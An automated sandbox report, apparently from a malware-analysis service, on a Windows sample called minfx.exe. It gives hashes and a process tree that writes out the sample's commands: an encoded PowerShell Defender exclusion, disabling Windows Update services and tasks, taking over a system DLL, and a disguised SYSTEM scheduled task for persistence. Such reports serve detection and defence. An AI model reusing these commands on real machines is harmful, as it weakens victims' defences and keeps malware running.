Analysis
-
max time kernel
95s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
13-05-2022 17:54
Static task
static1
Behavioral task
behavioral1
Sample
minfx.exe
Resource
win7-20220414-en
General
-
Target
minfx.exe
-
Size
4.2MB
-
MD5
8268ff95b3aaea6d6de8f02a73c323d2
-
SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca
-
SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
-
SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1036 updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1296 takeown.exe 688 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1784 cmd.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1296 takeown.exe 688 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.execonhost.exepid process 1632 powershell.exe 1092 conhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exedescription pid process Token: SeDebugPrivilege 1632 powershell.exe Token: SeShutdownPrivilege 1544 powercfg.exe Token: SeShutdownPrivilege 896 powercfg.exe Token: SeShutdownPrivilege 1784 powercfg.exe Token: SeShutdownPrivilege 364 powercfg.exe Token: SeDebugPrivilege 1092 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
minfx.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1992 wrote to memory of 1092 1992 minfx.exe conhost.exe PID 1992 wrote to memory of 1092 1992 minfx.exe conhost.exe PID 1992 wrote to memory of 1092 1992 minfx.exe conhost.exe PID 1992 wrote to memory of 1092 1992 minfx.exe conhost.exe PID 1092 wrote to memory of 1836 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 1836 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 1836 1092 conhost.exe cmd.exe PID 1836 wrote to memory of 1632 1836 cmd.exe powershell.exe PID 1836 wrote to memory of 1632 1836 cmd.exe powershell.exe PID 1836 wrote to memory of 1632 1836 cmd.exe powershell.exe PID 1092 wrote to memory of 588 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 588 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 588 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 776 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 776 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 776 1092 conhost.exe cmd.exe PID 588 wrote to memory of 1156 588 cmd.exe sc.exe PID 588 wrote to memory of 1156 588 cmd.exe sc.exe PID 588 wrote to memory of 1156 588 cmd.exe sc.exe PID 588 wrote to memory of 1660 588 cmd.exe sc.exe PID 588 wrote to memory of 1660 588 cmd.exe sc.exe PID 588 wrote to memory of 1660 588 cmd.exe sc.exe PID 776 wrote to memory of 1544 776 cmd.exe powercfg.exe PID 776 wrote to memory of 1544 776 cmd.exe powercfg.exe PID 776 wrote to memory of 1544 776 cmd.exe powercfg.exe PID 588 wrote to memory of 1000 588 cmd.exe sc.exe PID 588 wrote to memory of 1000 588 cmd.exe sc.exe PID 588 wrote to memory of 1000 588 cmd.exe sc.exe PID 588 wrote to memory of 1760 588 cmd.exe sc.exe PID 588 wrote to memory of 1760 588 cmd.exe sc.exe PID 588 wrote to memory of 1760 588 cmd.exe sc.exe PID 588 wrote to memory of 1620 588 cmd.exe sc.exe PID 588 wrote to memory of 1620 588 cmd.exe sc.exe PID 588 wrote to memory of 1620 588 cmd.exe sc.exe PID 776 wrote to memory of 896 776 cmd.exe powercfg.exe PID 776 wrote to memory of 896 776 cmd.exe powercfg.exe PID 776 wrote to memory of 896 776 cmd.exe powercfg.exe PID 588 wrote to memory of 1696 588 cmd.exe sc.exe PID 588 wrote to memory of 1696 588 cmd.exe sc.exe PID 588 wrote to memory of 1696 588 cmd.exe sc.exe PID 776 wrote to memory of 1784 776 cmd.exe powercfg.exe PID 776 wrote to memory of 1784 776 cmd.exe powercfg.exe PID 776 wrote to memory of 1784 776 cmd.exe powercfg.exe PID 776 wrote to memory of 364 776 cmd.exe powercfg.exe PID 776 wrote to memory of 364 776 cmd.exe powercfg.exe PID 776 wrote to memory of 364 776 cmd.exe powercfg.exe PID 588 wrote to memory of 1444 588 cmd.exe sc.exe PID 588 wrote to memory of 1444 588 cmd.exe sc.exe PID 588 wrote to memory of 1444 588 cmd.exe sc.exe PID 588 wrote to memory of 1736 588 cmd.exe sc.exe PID 588 wrote to memory of 1736 588 cmd.exe sc.exe PID 588 wrote to memory of 1736 588 cmd.exe sc.exe PID 1092 wrote to memory of 2032 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 2032 1092 conhost.exe cmd.exe PID 1092 wrote to memory of 2032 1092 conhost.exe cmd.exe PID 588 wrote to memory of 1100 588 cmd.exe sc.exe PID 588 wrote to memory of 1100 588 cmd.exe sc.exe PID 588 wrote to memory of 1100 588 cmd.exe sc.exe PID 2032 wrote to memory of 1608 2032 cmd.exe schtasks.exe PID 2032 wrote to memory of 1608 2032 cmd.exe schtasks.exe PID 2032 wrote to memory of 1608 2032 cmd.exe schtasks.exe PID 588 wrote to memory of 904 588 cmd.exe sc.exe PID 588 wrote to memory of 904 588 cmd.exe sc.exe PID 588 wrote to memory of 904 588 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\minfx.exe"C:\Users\Admin\AppData\Local\Temp\minfx.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""4⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
memory/364-75-0x0000000000000000-mapping.dmp
-
memory/456-93-0x0000000000000000-mapping.dmp
-
memory/580-89-0x0000000000000000-mapping.dmp
-
memory/588-64-0x0000000000000000-mapping.dmp
-
memory/660-85-0x0000000000000000-mapping.dmp
-
memory/688-88-0x0000000000000000-mapping.dmp
-
memory/692-86-0x0000000000000000-mapping.dmp
-
memory/776-65-0x0000000000000000-mapping.dmp
-
memory/824-101-0x0000000000000000-mapping.dmp
-
memory/896-72-0x0000000000000000-mapping.dmp
-
memory/904-81-0x0000000000000000-mapping.dmp
-
memory/908-91-0x0000000000000000-mapping.dmp
-
memory/932-95-0x0000000000000000-mapping.dmp
-
memory/1000-69-0x0000000000000000-mapping.dmp
-
memory/1004-99-0x0000000000000000-mapping.dmp
-
memory/1036-104-0x0000000000000000-mapping.dmp
-
memory/1092-56-0x000000001B680000-0x000000001BAA0000-memory.dmpFilesize
4.1MB
-
memory/1092-54-0x0000000000150000-0x000000000058E000-memory.dmpFilesize
4.2MB
-
memory/1092-55-0x000000001BAC0000-0x000000001BEFE000-memory.dmpFilesize
4.2MB
-
memory/1092-57-0x000007FEFB871000-0x000007FEFB873000-memory.dmpFilesize
8KB
-
memory/1100-79-0x0000000000000000-mapping.dmp
-
memory/1156-66-0x0000000000000000-mapping.dmp
-
memory/1296-87-0x0000000000000000-mapping.dmp
-
memory/1320-96-0x0000000000000000-mapping.dmp
-
memory/1436-92-0x0000000000000000-mapping.dmp
-
memory/1444-76-0x0000000000000000-mapping.dmp
-
memory/1512-100-0x0000000000000000-mapping.dmp
-
memory/1544-68-0x0000000000000000-mapping.dmp
-
memory/1576-82-0x0000000000000000-mapping.dmp
-
memory/1608-80-0x0000000000000000-mapping.dmp
-
memory/1620-71-0x0000000000000000-mapping.dmp
-
memory/1632-63-0x00000000026EB000-0x000000000270A000-memory.dmpFilesize
124KB
-
memory/1632-59-0x0000000000000000-mapping.dmp
-
memory/1632-61-0x000007FEED860000-0x000007FEEE3BD000-memory.dmpFilesize
11.4MB
-
memory/1632-62-0x00000000026E4000-0x00000000026E7000-memory.dmpFilesize
12KB
-
memory/1660-67-0x0000000000000000-mapping.dmp
-
memory/1668-94-0x0000000000000000-mapping.dmp
-
memory/1696-73-0x0000000000000000-mapping.dmp
-
memory/1736-77-0x0000000000000000-mapping.dmp
-
memory/1760-70-0x0000000000000000-mapping.dmp
-
memory/1772-83-0x0000000000000000-mapping.dmp
-
memory/1784-74-0x0000000000000000-mapping.dmp
-
memory/1784-102-0x0000000000000000-mapping.dmp
-
memory/1832-84-0x0000000000000000-mapping.dmp
-
memory/1836-58-0x0000000000000000-mapping.dmp
-
memory/1844-90-0x0000000000000000-mapping.dmp
-
memory/1960-97-0x0000000000000000-mapping.dmp
-
memory/1988-98-0x0000000000000000-mapping.dmp
-
memory/2032-78-0x0000000000000000-mapping.dmp